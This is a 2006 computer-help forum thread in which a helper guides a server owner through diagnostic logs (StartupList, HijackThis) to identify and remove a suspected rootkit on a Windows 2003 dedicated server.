Intersite Messaging: %SystemRoot%\System32\ismserv.exe (disabled)
Keyboard Class Driver: system32\DRIVERS\kbdclass.sys (system)
Keyboard HID Driver: system32\DRIVERS\kbdhid.sys (system)
Kerberos Key Distribution Center: %SystemRoot%\System32\lsass.exe (disabled)
Server: %SystemRoot%\system32\svchost.exe -k netsvcs (autostart)
Workstation: %SystemRoot%\system32\svchost.exe -k netsvcs (autostart)
License Logging: %SystemRoot%\System32\llssrv.exe (disabled)
TCP/IP NetBIOS Helper: %SystemRoot%\system32\svchost.exe -k LocalService (autostart)
Messenger: %SystemRoot%\system32\svchost.exe -k netsvcs (disabled)
NetMeeting Remote Desktop Sharing: C:\WINDOWS\system32\mnmsrvc.exe (disabled)
Mouse Class Driver: system32\DRIVERS\mouclass.sys (system)
Mouse HID Driver: system32\DRIVERS\mouhid.sys (manual start)
WebDav Client Redirector: system32\DRIVERS\mrxdav.sys (manual start)
MRXSMB: system32\DRIVERS\mrxsmb.sys (system)
Distributed Transaction Coordinator: C:\WINDOWS\system32\msdtc.exe (autostart)
Windows Installer: C:\WINDOWS\system32\msiexec.exe /V (manual start)
Microsoft Search: "C:\Program Files\Common Files\System\MSSearch\Bin\mssearch.exe" (autostart)
Microsoft System Management BIOS Driver: system32\DRIVERS\mssmbios.sys (manual start)
MSSQLSERVER: C:\PROGRA~1\MICROS~1\MSSQL\binn\sqlservr.exe (autostart)
MSSQLServerADHelper: C:\Program Files\Microsoft SQL Server\80\Tools\Binn\sqladhlp.exe (manual start)
Remote Access NDIS TAPI Driver: system32\DRIVERS\ndistapi.sys (manual start)
NDIS Usermode I/O Protocol: system32\DRIVERS\ndisuio.sys (manual start)
Remote Access NDIS WAN Driver: system32\DRIVERS\ndiswan.sys (manual start)
NetBIOS Interface: system32\DRIVERS\netbios.sys (system)
NetBios over Tcpip: system32\DRIVERS\netbt.sys (system)
Network DDE: %SystemRoot%\system32\netdde.exe (disabled)
Network DDE DSDM: %SystemRoot%\system32\netdde.exe (disabled)
Net Logon: %SystemRoot%\system32\lsass.exe (manual start)
Network Connections: %SystemRoot%\System32\svchost.exe -k netsvcs (manual start)
Network Location Awareness (NLA): %SystemRoot%\system32\svchost.exe -k netsvcs (manual start)
File Replication: %SystemRoot%\system32\ntfrs.exe (manual start)
NT LM Security Support Provider: %SystemRoot%\system32\lsass.exe (manual start)
Removable Storage: %SystemRoot%\system32\svchost.exe -k netsvcs (manual start)
Parallel port driver: system32\DRIVERS\parport.sys (manual start)
Parvdm: system32\DRIVERS\parvdm.sys (autostart)
PCI Bus Driver: system32\DRIVERS\pci.sys (system)
Plug and Play: %SystemRoot%\system32\services.exe (autostart)
IPSEC Services: %SystemRoot%\system32\lsass.exe (autostart)
MailMax 5.5 - Pop3 Service: C:\Program Files\MailMax5\PopMax.exe (autostart)
WAN Miniport (PPTP): system32\DRIVERS\raspptp.sys (manual start)
Processor Driver: system32\DRIVERS\processr.sys (manual start)
Protected Storage: %SystemRoot%\system32\lsass.exe (autostart)
Direct Parallel Link Driver: system32\DRIVERS\ptilink.sys (manual start)
MailMax 5.5 - Outbound Queue Service: C:\Program Files\MailMax5\QueueMax.exe (autostart)
Remote Access Auto Connection Driver: system32\DRIVERS\rasacd.sys (system)
Remote Access Auto Connection Manager: %SystemRoot%\system32\svchost.exe -k netsvcs (manual start)
WAN Miniport (L2TP): system32\DRIVERS\rasl2tp.sys (manual start)
Remote Access Connection Manager: %SystemRoot%\system32\svchost.exe -k netsvcs (manual start)
Remote Access PPPOE Driver: system32\DRIVERS\raspppoe.sys (manual start)
Direct Parallel: system32\DRIVERS\raspti.sys (manual start)
Rdbss: system32\DRIVERS\rdbss.sys (system)
RDPCDD: System32\DRIVERS\RDPCDD.sys (system)
Terminal Server Device Redirector Driver: system32\DRIVERS\rdpdr.sys (manual start)
Remote Desktop Help Session Manager: C:\WINDOWS\system32\sessmgr.exe (manual start)
Digital CD Audio Playback Filter Driver: system32\DRIVERS\redbook.sys (system)
Routing and Remote Access: %SystemRoot%\system32\svchost.exe -k netsvcs (disabled)
Remote Registry: %SystemRoot%\system32\svchost.exe -k regsvc (manual start)
Remote Procedure Call (RPC) Locator: %SystemRoot%\system32\locator.exe (manual start)
Remote Procedure Call (RPC): %SystemRoot%\system32\svchost.exe -k rpcss (autostart)
Resultant Set of Policy Provider: %SystemRoot%\system32\RSoPProv.exe (manual start)
Special Administration Console Helper: %SystemRoot%\System32\svchost.exe -k netsvcs (manual start)
Security Accounts Manager: %SystemRoot%\system32\lsass.exe (autostart)
Smart Card: %SystemRoot%\System32\SCardSvr.exe (manual start)
Task Scheduler: %SystemRoot%\System32\svchost.exe -k netsvcs (manual start)
Simple DNS Plus: C:\Program Files\Simple DNS Plus\sdnsmain.exe (autostart)
Secdrv: system32\DRIVERS\secdrv.sys (manual start)
Secondary Logon: %SystemRoot%\System32\svchost.exe -k netsvcs (disabled)
System Event Notification: %SystemRoot%\system32\svchost.exe -k netsvcs (autostart)
Serenum Filter Driver: system32\DRIVERS\serenum.sys (manual start)
Serial port driver: system32\DRIVERS\serial.sys (system)
Serv-U FTP Server: C:\Program Files\Serv-U\ServUDaemon.exe (autostart)
Windows Firewall/Internet Connection Sharing (ICS): %SystemRoot%\system32\svchost.exe -k netsvcs (disabled)
Shell Hardware Detection: %SystemRoot%\System32\svchost.exe -k netsvcs (autostart)
MailMax 5.5 - SMTP Service: C:\Program Files\MailMax5\SMTPMax5.exe (autostart)
Print Spooler: %SystemRoot%\system32\spoolsv.exe (autostart)
SQLSERVERAGENT: C:\PROGRA~1\MICROS~1\MSSQL\binn\sqlagent.exe (autostart)
Srv: system32\DRIVERS\srv.sys (manual start)
Windows Image Acquisition (WIA): %SystemRoot%\system32\svchost.exe -k imgsvc (disabled)
Software Bus Driver: system32\DRIVERS\swenum.sys (manual start)
Microsoft Software Shadow Copy Provider: %SystemRoot%\System32\svchost.exe -k swprv (manual start)
Performance Logs and Alerts: %SystemRoot%\system32\smlogsvc.exe (manual start)
Telephony: %SystemRoot%\System32\svchost.exe -k tapisrv (manual start)
TCP/IP Protocol Driver: system32\DRIVERS\tcpip.sys (system)
Terminal Device Driver: system32\DRIVERS\termdd.sys (autostart)
Terminal Services: %SystemRoot%\System32\svchost.exe -k termsvcs (autostart)
Themes: %SystemRoot%\System32\svchost.exe -k netsvcs (disabled)
Telnet: C:\WINDOWS\system32\tlntsvr.exe (disabled)
Distributed Link Tracking Server: %SystemRoot%\system32\svchost.exe -k netsvcs (disabled)
Distributed Link Tracking Client: %SystemRoot%\system32\svchost.exe -k netsvcs (autostart)
Terminal Services Session Directory: %SystemRoot%\System32\tssdis.exe (disabled)
Windows User Mode Driver Framework: C:\WINDOWS\system32\wdfmgr.exe (manual start)
Microcode Update Driver: system32\DRIVERS\update.sys (manual start)
Upload Manager: %SystemRoot%\System32\svchost.exe -k netsvcs (manual start)
Uninterruptible Power Supply: %SystemRoot%\System32\ups.exe (manual start)
Urchin Scheduler: C:\Program Files\Urchin\bin\urchind.exe (autostart)
Urchin Webserver: C:\Program Files\Urchin\bin\urchinwebd.exe --ntservice (autostart)
Microsoft USB Generic Parent Driver: system32\DRIVERS\usbccgp.sys (manual start)
Microsoft USB Standard Hub Driver: system32\DRIVERS\usbhub.sys (manual start)
Microsoft USB Universal Host Controller Miniport Driver: system32\DRIVERS\usbuhci.sys (manual start)
Virtual Disk Service: %SystemRoot%\System32\vds.exe (manual start)
VGA Display Controller.: \SystemRoot\System32\drivers\vga.sys (system)
Storage volumes: system32\DRIVERS\volsnap.sys (system)
Volume Shadow Copy: %SystemRoot%\System32\vssvc.exe (manual start)
Distributed Transaction Coordinator Control: \??\c:\windows\system32\dllcache\vsvss.sys (manual start)
Windows Time: %SystemRoot%\system32\svchost.exe -k LocalService (autostart)
World Wide Web Publishing Service: %SystemRoot%\System32\svchost.exe -k iissvcs (autostart)
Remote Access IP ARP Driver: system32\DRIVERS\wanarp.sys (manual start)
WebClient: %SystemRoot%\system32\svchost.exe -k LocalService (disabled)
WinHTTP Web Proxy Auto-Discovery Service: %SystemRoot%\system32\svchost.exe -k LocalService (manual start)
Windows Management Instrumentation: %systemroot%\system32\svchost.exe -k netsvcs (autostart)
Network Load Balancing: system32\DRIVERS\wlbs.sys (manual start)
Portable Media Serial Number Service: %SystemRoot%\System32\svchost.exe -k netsvcs (manual start)
Windows Management Instrumentation Driver Extensions: %SystemRoot%\System32\svchost.exe -k netsvcs (manual start)
WMI Performance Adapter: C:\WINDOWS\system32\wbem\wmiapsrv.exe (manual start)
Automatic Updates: %systemroot%\system32\svchost.exe -k netsvcs (autostart)
Wireless Configuration: %SystemRoot%\System32\svchost.exe -k netsvcs (disabled)
Network Provisioning Service: %SystemRoot%\System32\svchost.exe -k netsvcs (manual start)

--------------------------------------------------

Enumerating Windows NT logon/logoff scripts:
*No scripts set to run*

Windows NT checkdisk command:
BootExecute = autocheck autochk *

Windows NT 'Wininit.ini':
PendingFileRenameOperations: *Registry value not found*

--------------------------------------------------

Enumerating ShellServiceObjectDelayLoad items:

PostBootReminder: C:\WINDOWS\system32\SHELL32.dll
CDBurn: C:\WINDOWS\system32\SHELL32.dll
WebCheck: C:\WINDOWS\system32\webcheck.dll
SysTray: C:\WINDOWS\system32\stobject.dll

--------------------------------------------------
Autorun entries from Registry:
HKCU\Software\Microsoft\Windows\CurrentVersion\policies\Explorer\Run

*Registry key not found*

Autorun entries from Registry:
HKLM\Software\Microsoft\Windows\CurrentVersion\policies\Explorer\Run

*Registry key not found*

End of report, 31,930 bytes
Report generated in 0.266 seconds


----------



## Gunny123 (Mar 29, 2006)

Are there any problems with disabling the windows firewall/internet connection sharing service?

Also, would anyone recommend/not recommend modifying the advanced tcp/ip options filtering? And just add the ports I need? I'm hesitant to do this because I don't want to get kicked out because I use remote desktop and don't want the web server, etc to stop working for even a short amount of time.


----------



## dvk01 (Dec 14, 2002)

this is the service responsible
c:\windows\system32\dllcache\vsvss.sys

let's have a normal HJT log & also


Download *WinPFind*
*Right Click* the Zip Folder and Select "*Extract All*"
Extract it somewhere you will remember like the *Desktop*
Dont do anything with it yet!

Reboot into Safe Mode
Restart your computer and as soon as it starts booting up again continuously tap F8. A menu should come up where you will be given the option to enter Safe Mode.

Doubleclick *WinPFind.exe*
Click "* Configure Scan Options*"
Select " *Run Add ONs*" and then select *ALL* the options in the box below it, Press Apply 
Now Click "*Start Scan*"
*It will scan the entire System, so please be patient!*
Once the Scan is Complete
Reboot back to Normal Mode!
Go to the *WinPFind folder*
Locate *WinPFind.txt*
Place those results in the next post!. It will be too big to post so you will need to attach it to your reply


----------



## dvk01 (Dec 14, 2002)

please do this for me so I can see what the service interacts with

please go to http://www.thespykiller.co.uk/forum/index.php?board=1.0 and upload these files so I can examine them and distribute them to antivirus companies.
Just press new topic, fill in the needed details and just give a link to your post here & then press the browse button and then navigate to & select the files on your computer, If there is more than 1 file then press the more attachments button for each extra file and browse and select etc and then when all the files are listed in the windows press send to upload the files ( do not post HJT logs there as they will not get dealt with)

Files to submit:

c:\windows\system32\dllcache\vsvss.sys


----------



## Gunny123 (Mar 29, 2006)

You are right on the money. As soon as I saw that vsvss.sys I knew that was it. I saw that hiding itself and a name was not shown.

Also, I see an active connection to reality-board.de.

However, I can't do what you asked because this is a dedicated server and I don't have console access. I noticed you are just looking for the txt file though and it doesn't actually clean it up, is there anyway you don't need this? I can try to have someone do this after hours in the data center, if I'm lucky. It's not a managed dedicated server.

Is this the "normal" output you are looking for? If not, can you explain how I get the output you are looking for?

StartupList report, 3/29/2006, 5:29:50 AM
StartupList version: 1.52.2
Started from : C:\Installed\HijackThis.EXE
Detected: Windows 2003 SP1 (WinNT 5.02.3790)
Detected: Internet Explorer v6.00 SP1 (6.00.3790.1830)
* Using default options
==================================================

Running processes:

C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\csrss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\system32\msdtc.exe
C:\Program Files\Alwil Software\Avast4\aswUpdSv.exe
C:\Program Files\Alwil Software\Avast4\aswServ.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\inetsrv\inetinfo.exe
C:\PROGRA~1\MICROS~1\MSSQL\binn\sqlservr.exe
C:\Program Files\Simple DNS Plus\sdnsmain.exe
C:\Program Files\Serv-U\ServUDaemon.exe
C:\PROGRA~1\MICROS~1\MSSQL\binn\sqlagent.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Urchin\bin\urchind.exe
C:\Program Files\Urchin\bin\urchinwebd.exe
C:\Program Files\Urchin\bin\urchinwebd.exe
C:\Program Files\MailMax5\DataMaxDB.exe
C:\Program Files\Common Files\System\MSSearch\Bin\mssearch.exe
C:\WINDOWS\System32\svchost.exe
c:\windows\system32\inetsrv\w3wp.exe
C:\Program Files\MailMax5\HouseKeep.exe
C:\Program Files\MailMax5\IMAPMax.exe
C:\Program Files\MailMax5\PopMax.exe
C:\Program Files\MailMax5\QueueMax.exe
C:\Program Files\MailMax5\SMTPMax5.exe
C:\WINDOWS\system32\wbem\wmiprvse.exe
C:\WINDOWS\system32\csrss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\rdpclip.exe
C:\WINDOWS\Explorer.EXE
C:\PROGRA~1\ALWILS~1\Avast4\aswDisp.exe
C:\Program Files\Simple DNS Plus\sdnsgui.exe
c:\windows\system32\inetsrv\w3wp.exe
c:\windows\system32\inetsrv\w3wp.exe
c:\windows\system32\inetsrv\w3wp.exe
C:\WINDOWS\explorer.exe
C:\Installed\HijackThis.exe

--------------------------------------------------

Checking Windows NT UserInit:

[HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
UserInit = C:\WINDOWS\system32\userinit.exe,

--------------------------------------------------

Autorun entries from Registry:
HKLM\Software\Microsoft\Windows\CurrentVersion\Run

Simple DNS Plus = C:\Program Files\Simple DNS Plus\sdnsplus.exe -s
avast! = C:\PROGRA~1\ALWILS~1\Avast4\aswDisp.exe

--------------------------------------------------

Shell & screensaver key from C:\WINDOWS\SYSTEM.INI:

Shell=*INI section not found*
SCRNSAVE.EXE=*INI section not found*
drivers=*INI section not found*

Shell & screensaver key from Registry:

Shell=Explorer.exe
SCRNSAVE.EXE=C:\WINDOWS\System32\logon.scr
drivers=*Registry value not found*

Policies Shell key:

HKCU\..\Policies: Shell=*Registry key not found*
HKLM\..\Policies: Shell=*Registry value not found*

--------------------------------------------------

Enumerating Download Program Files:

[Housecall ActiveX 6.5]
InProcServer32 = C:\WINDOWS\Downloaded Program Files\Housecall_ActiveX.dll
CODEBASE = http://housecall65.trendmicro.com/housecall/applet/html/native/x86/win32/activex/hcImpl.cab

[Shockwave Flash Object]
InProcServer32 = C:\WINDOWS\system32\Macromed\Flash\Flash8a.ocx
CODEBASE = http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab

--------------------------------------------------

Enumerating ShellServiceObjectDelayLoad items:

PostBootReminder: C:\WINDOWS\system32\SHELL32.dll
CDBurn: C:\WINDOWS\system32\SHELL32.dll
WebCheck: C:\WINDOWS\system32\webcheck.dll
SysTray: C:\WINDOWS\system32\stobject.dll

--------------------------------------------------
End of report, 4,509 bytes
Report generated in 0.187 seconds


----------



## Gunny123 (Mar 29, 2006)

dvk01 said:


> please do this for me so I can see what the service interacts with
> 
> please go to http://www.thespykiller.co.uk/forum/index.php?board=1.0 and upload these files so I can examine them and distribute them to antivirus companies.
> Just press new topic, fill in the needed details and just give a link to your post here & then press the browse button and then navigate to & select the files on your computer, If there is more than 1 file then press the more attachments button for each extra file and browse and select etc and then when all the files are listed in the windows press send to upload the files ( do not post HJT logs there as they will not get dealt with)
> ...


It looks like that specific .sys file is hidden. However, I did see an exe, i.e., vsvss.exe, and also it had a plain text ini file that had hacker type crap in there like ports, file names, etc.

Should I post these?


----------



## Gunny123 (Mar 29, 2006)

Good news! While it's not fixed completely, I think I got rid of some of it.

Basically, what got me somewhere, is I set up IPSec I belive it's called. It's where you go to the tcp/ip properties, advanced, and setup tcp/ip filters. I setup the filters to only allow the ports I needed.

Then, I rebooted. All of the previously hidden files and services were now visible! Also, all of the files that it works with in the system32\wbem directory were visible also. My anti-virus software was also able to detect multiple different viruses. After I saw this, I stopped the services, killed the processes, got rid of the registry settings forthe services, moved the files and renamed the files to my bad directory. I then got all of the file names from the batch file, did a search, cut and pasted them into my bad dirctory, renaming also. I got their rar file (samclt.dll) and their unrar.exe, and was able to isolate these files as well.

My AV software popped up a message when opening and said there was a certain virus that it needed to do a BOOT TIME scan, this is a server in a data center so I hestiated but did it anyway. It went a lot faster than I thought it would, only about 5 or 10 mins.

However, IT'S NOT FIXED completely. When it booted up back up, I went through, and the files weren't there, the services were no longer there, the registry settings weren't there, etc, etc.

However, the batch file was in the windows\temp directory, and WAS ran. I know this because windows firewall was enabled again. However, the good news is, because I was able to get their zip file and all of the others files, their windows usernames weren't created, the services weren't started, etc. Basically, everything else in that batch file needs an external file in their rar file except their windows firewall changes because that uses netsh commands.

The bad news is I don't think the boot time scan got rid of it completely or else the batch file wouldn't have been ran. Using autoruns I got rid of the startup for the vsvss.sys, and I don't see it in the auto runs anymore, so at this point not sure what to do.

Also, I saw and still see this service named "NT Service" with a file name of: C:\WINDOWS\system32\ntkrnlp.exe. Attributes are HSA. Weird thing is, the startup type is automatic but it's not running. I wonder if this is the culprit. 

Should I try removing it?
Any ideas?


----------



## dvk01 (Dec 14, 2002)

you have given me a start uplist and we really need aHJT log as that sj=hows a few different things

go to here and download 'Hijack This!' self installer. Save it to the desktop or other suitable place. * DO NOT just press run from the website* Double click on the file and it will install to C:\program files\hijackthis and create an entry in the start menu and an optional shortcut on desktop. 
Click on the entry in start menu or on the desktop to run HijackThis
Click the "Scan" button, when the scan is finished the scan button will become "Save Log" click that and save the log. 
Go to where you saved the log and click on "Edit > Select All" then click on "Edit > Copy" then Paste the log back here in a reply.
It will possibly show issues deserving our attention, but most of what it lists will be harmless or even required, 
so *do NOT fix anything yet.*
Someone here will be happy to help you analyze the results.

then run wpfind in normal mode

however to clean this successfully you are going to have to take it off line otherwise it willl immediately reinfect itself again

otherwise it is like putting a sticking plaster on a broken leg

when you have a chance & I suggesty fairly quickly, take it off line and do the scans and also doo ascan with rootkit revealewr or blaclklite as I strongly suspect a rootkit has been installed via a recently discovered windows vulnerability


----------



## Gunny123 (Mar 29, 2006)

Oh, sorry, I didn't think that other info was needed and the start up was what you guys wanted.

Anyway, here it is:

Logfile of HijackThis v1.99.1
Scan saved at 11:37:45 AM, on 3/30/2006
Platform: Windows 2003 SP1 (WinNT 5.02.3790)
MSIE: Internet Explorer v6.00 SP1 (6.00.3790.1830)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Alwil Software\Avast4\aswUpdSv.exe
C:\Program Files\Alwil Software\Avast4\aswServ.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\ewido anti-malware\ewidoctrl.exe
C:\WINDOWS\system32\inetsrv\inetinfo.exe
C:\PROGRA~1\MICROS~1\MSSQL\binn\sqlservr.exe
C:\Program Files\Simple DNS Plus\sdnsmain.exe
C:\Program Files\Serv-U\ServUDaemon.exe
C:\PROGRA~1\MICROS~1\MSSQL\binn\sqlagent.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Urchin\bin\urchind.exe
C:\Program Files\Urchin\bin\urchinwebd.exe
C:\Program Files\Urchin\bin\urchinwebd.exe
C:\Program Files\MailMax5\DataMaxDB.exe
C:\Program Files\Common Files\System\MSSearch\Bin\mssearch.exe
C:\Program Files\MailMax5\PopMax.exe
C:\Program Files\MailMax5\QueueMax.exe
C:\Program Files\MailMax5\SMTPMax5.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\MailMax5\HouseKeep.exe
C:\Program Files\MailMax5\IMAPMax.exe
c:\windows\system32\inetsrv\w3wp.exe
c:\windows\system32\inetsrv\w3wp.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\rdpclip.exe
C:\WINDOWS\Explorer.EXE
C:\PROGRA~1\ALWILS~1\Avast4\aswDisp.exe
C:\Program Files\Simple DNS Plus\sdnsgui.exe
C:\WINDOWS\system32\scrnsave.scr
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\rdpclip.exe
C:\WINDOWS\Explorer.EXE
C:\PROGRA~1\ALWILS~1\Avast4\aswDisp.exe
C:\Program Files\Simple DNS Plus\sdnsgui.exe
C:\Program Files\ewido anti-malware\SecuritySuite.exe
C:\WINDOWS\explorer.exe
C:\Installed\HijackThis.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = res://shdoclc.dll/hardAdmin.htm
R1 - HKCU\Software\Microsoft\Internet Connection Wizard,ShellNext = http://yahoo.com/
O4 - HKLM\..\Run: [Simple DNS Plus] C:\Program Files\Simple DNS Plus\sdnsplus.exe -s
O4 - HKLM\..\Run: [avast!] C:\PROGRA~1\ALWILS~1\Avast4\aswDisp.exe
O16 - DPF: {6E5A37BF-FD42-463A-877C-4EB7002E68AE} (Housecall ActiveX 6.5) - http://housecall65.trendmicro.com/housecall/applet/html/native/x86/win32/activex/hcImpl.cab
O20 - Winlogon Notify: dimsntfy - C:\WINDOWS\SYSTEM32\dimsntfy.dll
O23 - Service: avast! iAVS4 Control Service (aswUpdSv) - Unknown owner - C:\Program Files\Alwil Software\Avast4\aswUpdSv.exe
O23 - Service: avast! Antivirus - Unknown owner - C:\Program Files\Alwil Software\Avast4\aswServ.exe
O23 - Service: avast! Mail Scanner - Unknown owner - C:\Program Files\Alwil Software\Avast4\aswMaiSv.exe" /service (file missing)
O23 - Service: avast! Web Scanner - Unknown owner - C:\Program Files\Alwil Software\Avast4\aswWebSv.exe" /service (file missing)
O23 - Service: Backup Exec Remote Agent for Windows Servers (BackupExecAgentAccelerator) - VERITAS Software Corporation - C:\Program Files\VERITAS\Backup Exec\RANT\beremote.exe
O23 - Service: CCDed - - c:\webcc\ccded\ccded.exe
O23 - Service: MailMax 5.5 - DataMaxDB .NET (DataMaxDB) - SmartMax Software, Inc. - C:\Program Files\MailMax5\DataMaxDB.exe
O23 - Service: Event Log Reporting Service (evtlgs) - Unknown owner - C:\WINDOWS\system32\rwinstall.exe (file missing)
O23 - Service: ewido security suite control - ewido networks - C:\Program Files\ewido anti-malware\ewidoctrl.exe
O23 - Service: ewido security suite guard - ewido networks - C:\Program Files\ewido anti-malware\ewidoguard.exe
O23 - Service: MailMax 5.5 - HouseKeeping (HouseKeeping) - SmartMax Software, Inc. - C:\Program Files\MailMax5\HouseKeep.exe
O23 - Service: MailMax 5.5 - Imap Service (IMAPMax5) - SmartMax Software, Inc. - C:\Program Files\MailMax5\IMAPMax.exe
O23 - Service: MailMax 5.5 - Pop3 Service (PopMax5) - SmartMax Software, Inc. - C:\Program Files\MailMax5\PopMax.exe
O23 - Service: MailMax 5.5 - Outbound Queue Service (QueueMax5) - SmartMax Software, Inc. - C:\Program Files\MailMax5\QueueMax.exe
O23 - Service: Simple DNS Plus (sdnsplus) - JH Software - C:\Program Files\Simple DNS Plus\sdnsmain.exe
O23 - Service: Serv-U FTP Server (Serv-U) - Rhino Software, Inc. +1(262) 560-9627 - C:\Program Files\Serv-U\ServUDaemon.exe
O23 - Service: MailMax 5.5 - SMTP Service (SMTPMax5) - SmartMax Software, Inc. - C:\Program Files\MailMax5\SMTPMax5.exe
O23 - Service: Urchin Scheduler (urchind) - Unknown owner - C:\Program Files\Urchin\bin\urchind.exe
O23 - Service: Urchin Webserver (UrchinWebserver) - Unknown owner - C:\Program Files\Urchin\bin\urchinwebd.exe

The screen saver looks a little suspicious, other than that, I don't think it would be in here because it was HIDING it's process and hijack this, process explorer, etc, didn't show it. This one product called security task manager was able to show 3 hidden processes running though. It would also hide the actual files in windows explorer, registry keys, and so on.


----------



## dvk01 (Dec 14, 2002)

This one looks suspicious and I'm guessing it's the rootkit service
O23 - Service: Event Log Reporting Service (evtlgs) - Unknown owner - C:\WINDOWS\system32\rwinstall.exe (file missing)

I doubt if ther file is missing as HJT has a bug where it doesn't show some services files

can you do this please

please go to http://www.thespykiller.co.uk/forum/index.php?board=1.0 and upload these files so I can examine them and distribute them to antivirus companies.
Just press new topic, fill in the needed details and just give a link to your post here & then press the browse button and then navigate to & select the files on your computer, If there is more than 1 file then press the more attachments button for each extra file and browse and select etc and then when all the files are listed in the windows press send to upload the files ( do not post HJT logs there as they will not get dealt with)

Files to submit:

C:\WINDOWS\system32\rwinstall.exe


----------



## Gunny123 (Mar 29, 2006)

Man, you've got a good eye.

I'm sorry but as I said before I can't upload the file!!! It's not a bug in HJT, it's some type of root kit that hides itself, it's process, file, etc. Also, I almost forgot about that service, but I already tried to remove it. I set it to disable, however, it still shows as automatic, so I went back to properties to disable again and by default it was at disabled!! Piece of s***.

Anyway, if you have any idea on how I can get this file even though it is doing this let me know and I'll send it. I want to send it to the AV companies bad.

Also, I'm going to try creating a file named rwinstall.exe in that direcotry, then rebooting, and seeing what happens. Maybe it won't be able to recreate the file and I'll get it.


----------

